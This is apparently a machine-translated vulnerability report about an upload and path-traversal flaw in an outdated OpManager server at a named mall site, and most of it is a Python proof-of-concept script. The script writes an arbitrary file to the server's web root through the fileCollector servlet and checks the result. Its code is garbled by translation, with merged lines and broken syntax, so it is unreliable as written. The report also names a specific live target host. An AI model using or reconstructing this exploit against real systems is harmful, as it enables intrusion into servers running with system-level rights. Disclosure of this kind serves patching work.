The maintenance and monitoring system of a mall owned by CITIC group has File Upload to obtain system permissions.
The opmanager version is too low, with a verification program written in python.
Problematic site: http://ns1.dchnu.com
An upload vulnerability exists when an earlier version of opmanager is used. The system runs with the admin permission and can directly execute commands with the system permission.
I wrote a verification program, which can be tested and tested in a simple way without the trouble of using metaspoodle.
#-*-Coding: UTF-8-*-import sys, httplib, webbrowserfrom optparse import OptionParserparser = OptionParser () parser. add_option ("-t", "-- target", dest = "host", help = "press the target host, not include http: //", metavar = "HOST ") parser. add_option ("-p", "-- port", dest = "port", default = '80', help = "press the port, default 80") (options, args) = parser. parse_args () print options. host, options. portif options. host = None: print 'Error: please press the correct target 'exit () host = options. host + ':' + options. portparams = "test by w00yun" # upload content filename = 'test1.txt '# Upload File Name url = "/servlet/com. me. opmanager. exists. remote. communication. fw. fe. fileCollector? RegionID = .. /.. /.. /& FILENAME = "+ filenameurl1 = 'HTTP: // '+ host +'/'+ filenameheaders = {" Content-Type ":" application/xml ", "Accept-Encoding": "gzip, deflate", "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1 ;. net clr 2.0.50727) "," Host ": host," Connection ":" Keep-Alive "," Cache-Control ":" no-cache "} con2 = httplib. HTTPConnection (host) con2.request ("POST", url, params, headers) r2 = con2.getresponse () if r2.status = 500: print "Success", "\ n" webbrowser. open_new_tab (url1) else: print "Failed", "\ n" con2.close ()
You can use-h to check the usage.
Solution:
Patch updates